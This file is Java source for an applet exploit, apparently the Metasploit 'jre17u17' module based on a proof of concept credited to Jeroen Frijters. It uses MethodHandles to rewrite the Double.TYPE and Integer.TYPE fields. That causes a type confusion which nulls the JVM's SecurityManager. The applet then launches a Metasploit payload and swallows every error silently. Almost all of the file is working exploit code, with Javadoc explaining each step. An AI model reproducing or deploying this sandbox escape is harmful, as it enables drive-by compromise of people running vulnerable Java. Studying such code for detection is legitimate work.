// Original PoC by Jeroen Frijters (@Jeroen Frijters)

import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;
import java.applet.Applet;
import metasploit.Payload;

/**
 * Source-side helper for the reflective copy in {@code Exploit.disableSecurityManager}.
 *
 * <p>Holds an {@code int} immediately followed by an {@code Object} reference.
 * The exploit stores {@code System.class} in {@code field2} and then reads
 * {@code field1} through {@code Field.get} while the primitive {@code TYPE}
 * fields are rewritten; the int/Object ordering appears to be deliberate for
 * that step (inferred from its use, not verifiable from the declaration alone).
 */
class Union1 {
    int field1;
    Object field2;
}

/**
 * Destination-side counterpart of {@link Union1}.
 *
 * <p>Same field shape, but {@code field2} is declared as {@link SystemClass}.
 * {@code Exploit.disableSecurityManager} writes the reflectively read value of
 * {@code Union1.field1} into {@code field1} and afterwards dereferences
 * {@code field2} without ever assigning it directly.
 */
class Union2 {
    int field1;
    SystemClass field2;
}

/**
 * Typed view consisting of thirty {@code Object} reference slots.
 *
 * <p>Never instantiated in this file. It exists only so that
 * {@code Union2.field2} can be read and written field-by-field;
 * {@code Exploit.disableSecurityManager} compares {@code f29} and {@code f30}
 * against the installed security manager and nulls whichever one matches.
 * Which slot (if any) corresponds to that reference is decided at runtime,
 * not by this declaration.
 */
class SystemClass {
    Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
        f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
        f24,f25,f26,f27,f28,f29,f30;
}

/**
 * Applet entry point of the jre17u17 module.
 *
 * <p>{@link #init()} first calls {@link #disableSecurityManager()} and then hands
 * control to {@code metasploit.Payload}. Every {@link Throwable} raised on that
 * path is swallowed, so a failed attempt leaves nothing in the applet console.
 * The distinctive action of this class, from a reviewer's or detection
 * standpoint, is the reflective rewriting of the static {@code Double.TYPE} and
 * {@code Integer.TYPE} fields via {@code MethodHandles.lookup().findStaticSetter}.
 */
public class Exploit extends Applet
{

    /** Default constructor; no state is initialised here. */
    public Exploit()
    {
    }
        
    /**
     * Attempts to clear the JVM's installed {@link SecurityManager} reference
     * without going through {@code System.setSecurityManager}.
     *
     * <p>Sequence, as written:
     * <ol>
     *   <li>Obtains static setters for the {@code TYPE} fields of {@code Double}
     *       and {@code Integer}, plus {@link Field} handles for the
     *       {@code field1} members of {@link Union1} and {@link Union2}.</li>
     *   <li>Rewrites {@code Double.TYPE} to {@code int.class} and
     *       {@code Integer.TYPE} to {@code null}.</li>
     *   <li>Stores {@code System.class} in {@code u1.field2} and, while the
     *       {@code TYPE} fields are still rewritten, copies {@code u1.field1}
     *       into {@code u2.field1} reflectively. The evident intent — inferred
     *       from the field layouts, not verifiable from this file — is that the
     *       copy performed under the swapped {@code TYPE} values leaves
     *       {@code u2.field2} referring to an object it was never assigned
     *       (a type confusion).</li>
     *   <li>Restores both {@code TYPE} fields to their real values.</li>
     *   <li>If {@code f29} or {@code f30} of the aliased object holds the
     *       current security manager, nulls that slot; otherwise nothing is
     *       changed and nothing is reported.</li>
     * </ol>
     *
     * <p>Returning normally does not prove the manager was cleared: the final
     * {@code else} branch is a silent no-op.
     *
     * @throws Throwable any reflection or {@code invokeExact} failure; the
     *         caller ({@link #init()}) catches and discards it
     */
    static void disableSecurityManager() throws Throwable {
        MethodHandle mh1, mh2;
        // Static setters for the primitive wrapper TYPE fields (normally final).
        mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
        mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
        Field fld1 = Union1.class.getDeclaredField("field1");
        Field fld2 = Union2.class.getDeclaredField("field1");
        // Keep the genuine primitive class objects so both TYPE fields can be
        // restored after the reflective copy below.
        Class classInt = int.class;
        Class classDouble = double.class;
        // Double.TYPE := int.class, Integer.TYPE := null.
        mh1.invokeExact(int.class);
        mh2.invokeExact((Class)null);
        Union1 u1 = new Union1();
        u1.field2 = System.class;
        Union2 u2 = new Union2();
        // Reflective copy of the int field performed while TYPE is rewritten;
        // u2.field2 is never assigned directly anywhere in this method.
        fld2.set(u2, fld1.get(u1));
        // Restore Double.TYPE and Integer.TYPE.
        mh1.invokeExact(classDouble);
        mh2.invokeExact(classInt);
        // Two candidate slots are probed by identity against the live manager;
        // which one (if either) applies is only known at runtime.
        if (u2.field2.f29 == System.getSecurityManager()) {
            u2.field2.f29 = null;
        } else if (u2.field2.f30 == System.getSecurityManager()) {
            u2.field2.f30 = null;
        } else {
            // Intentionally empty: a miss is silent (diagnostic print disabled).
            //System.out.println("security manager field not found");
        }
    }    

    /**
     * Applet lifecycle hook: runs {@link #disableSecurityManager()} and then
     * {@code Payload.main(null)}.
     *
     * <p>Both catch clauses are empty, so any failure is silent; the
     * {@code Exception} clause is redundant because the following
     * {@code Throwable} clause already covers it. {@code Payload.main} is
     * reached whenever {@code disableSecurityManager} returns normally, which
     * does not by itself mean the manager was cleared (see its silent
     * {@code else} branch).
     */
    public void init()
    {
        try
        {
            //System.out.println(System.getSecurityManager());
            disableSecurityManager();
            //System.out.println(System.getSecurityManager());
            //Runtime.getRuntime().exec("calc.exe");            
            Payload.main(null);
        }
        catch(Exception exception)
        {
            // Deliberately swallowed; subsumed by the Throwable clause below.
            //exception.printStackTrace();
        } catch(Throwable t) {
            // Deliberately swallowed: no trace of failure is left.
            //t.printStackTrace();
        }
    }

}